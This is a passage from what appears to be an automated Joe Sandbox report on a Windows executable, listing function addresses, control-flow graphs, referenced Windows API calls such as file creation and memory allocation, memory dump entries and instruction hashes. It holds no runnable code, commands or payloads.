                                                                                                    control_flow_graph 752 405e7f-405e8b 753 405e8c-405ec0 GetTickCount GetTempFileNameW 752->753 754 405ec2-405ec4 753->754 755 405ecf-405ed1 753->755 754->753 757 405ec6 754->757 756 405ec9-405ecc 755->756 757->756
                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32 ref: 00405E9D
                                                                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CountFileNameTempTick
                                                                                                    • String ID: nsa
                                                                                                    • API String ID: 1716503409-2209301699
                                                                                                    • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                                                    • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                                                                                    • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                                                    • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
                                                                                                    Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 758 4078c5-4078cb 759 4078d0-4078eb 758->759 760 4078cd-4078cf 758->760 761 407aeb-407aff 759->761 762 407bad-407bba 759->762 760->759 764 407b01-407b17 761->764 765 407b19-407b2c 761->765 763 407be7-407beb 762->763 766 407c4a-407c5d 763->766 767 407bed-407c0c 763->767 768 407b33-407b3a 764->768 765->768 771 407c65-407c68 766->771 772 407c25-407c39 767->772 773 407c0e-407c23 767->773 769 407b61-407b64 768->769 770 407b3c-407b40 768->770 769->771 774 407b46-407b5e 770->774 775 407ccd-407cd4 770->775 779 407350 771->779 780 407cec 771->780 776 407c3c-407c43 772->776 773->776 774->769 778 407cdd-407cea 775->778 781 407be1-407be4 776->781 782 407c45 776->782 783 407cef-407cf6 778->783 784 407357-40735b 779->784 785 40749b-4074b6 779->785 786 40746d-407471 779->786 787 4073ff-407403 779->787 780->783 781->763 789 407cd6 782->789 790 407bc6-407bde 782->790 784->778 792 407361-40736e 784->792 785->761 793 407c76-407c7d 786->793 794 407477-40748b 786->794 795 407409-407420 787->795 796 407c6d-407c74 787->796 789->778 790->781 792->780 797 407374-4073ba 792->797 793->778 798 40748e-407496 794->798 799 407423-407427 795->799 796->778 801 4073e2-4073e4 797->801 802 4073bc-4073c0 797->802 798->786 803 407498 798->803 799->787 800 407429-40742f 799->800 804 407431-407438 800->804 805 407459-40746b 800->805 808 4073f5-4073fd 801->808 809 4073e6-4073f3 801->809 806 4073c2-4073c5 GlobalFree 802->806 807 4073cb-4073d9 GlobalAlloc 802->807 803->785 810 407443-407453 GlobalAlloc 804->810 811 40743a-40743d GlobalFree 804->811 805->798 806->807 807->780 812 4073df 807->812 808->799 809->808 809->809 810->780 810->805 811->810 812->801
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                                                    • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                                                                    • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                                                    • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                                                                                    Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 813 407ac3-407ac7 814 407ac9-407bba 813->814 815 407ade-407ae4 813->815 825 407be7-407beb 814->825 817 407aeb-407aff 815->817 818 407b01-407b17 817->818 819 407b19-407b2c 817->819 822 407b33-407b3a 818->822 819->822 823 407b61-407b64 822->823 824 407b3c-407b40 822->824 828 407c65-407c68 823->828 826 407b46-407b5e 824->826 827 407ccd-407cd4 824->827 829 407c4a-407c5d 825->829 830 407bed-407c0c 825->830 826->823 831 407cdd-407cea 827->831 837 407350 828->837 838 407cec 828->838 829->828 833 407c25-407c39 830->833 834 407c0e-407c23 830->834 836 407cef-407cf6 831->836 835 407c3c-407c43 833->835 834->835 844 407be1-407be4 835->844 845 407c45 835->845 839 407357-40735b 837->839 840 40749b-4074b6 837->840 841 40746d-407471 837->841 842 4073ff-407403 837->842 838->836 839->831 846 407361-40736e 839->846 840->817 847 407c76-407c7d 841->847 848 407477-40748b 841->848 850 407409-407420 842->850 851 407c6d-407c74 842->851 844->825 852 407cd6 845->852 853 407bc6-407bde 845->853 846->838 854 407374-4073ba 846->854 847->831 855 40748e-407496 848->855 856 407423-407427 850->856 851->831 852->831 853->844 858 4073e2-4073e4 854->858 859 4073bc-4073c0 854->859 855->841 860 407498 855->860 856->842 857 407429-40742f 856->857 861 407431-407438 857->861 862 407459-40746b 857->862 865 4073f5-4073fd 858->865 866 4073e6-4073f3 858->866 863 4073c2-4073c5 GlobalFree 859->863 864 4073cb-4073d9 GlobalAlloc 859->864 860->840 867 407443-407453 GlobalAlloc 861->867 868 40743a-40743d GlobalFree 861->868 862->855 863->864 864->838 869 4073df 864->869 865->856 866->865 866->866 867->838 867->862 868->867 869->858
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                                                    • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                                                                    • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                                                    • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                                                                                    Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                                                    • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                                                                                    • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                                                    • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                                                                                    Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                                                    • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                                                                                    • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                                                    • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                                                                                    Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                                                    • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                                                                                    • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                                                    • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                                                                                    Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                                                    • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                                                                                    • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                                                    • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                                                                                    Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                                                                    • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                                                                    • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                                                                    • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Global$AllocFree
                                                                                                    • String ID:
                                                                                                    • API String ID: 3394109436-0
                                                                                                    • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                                                    • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                                                                                    • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                                                    • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                                                                                    Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                    • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3850602802-0
                                                                                                    • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                                                    • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                                                                                    • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                                                    • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                                                                                    Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$AttributesCreate
                                                                                                    • String ID:
                                                                                                    • API String ID: 415043291-0
                                                                                                    • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                                                    • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                                                                    • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                                                    • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                                                                                    Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 3188754299-0
                                                                                                    • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                                                    • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                                                                                    • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                                                    • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                                                                                    Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 2738559852-0
                                                                                                    • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                                                    • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                                                                                    • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                                                    • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                                                                                    Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                      • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                    • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Char$Next$CreateDirectoryPrev
                                                                                                    • String ID:
                                                                                                    • API String ID: 4115351271-0
                                                                                                    • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                                                    • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                                                                                    • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                                                    • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                                                                                    Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FilePointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 973152223-0
                                                                                                    • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
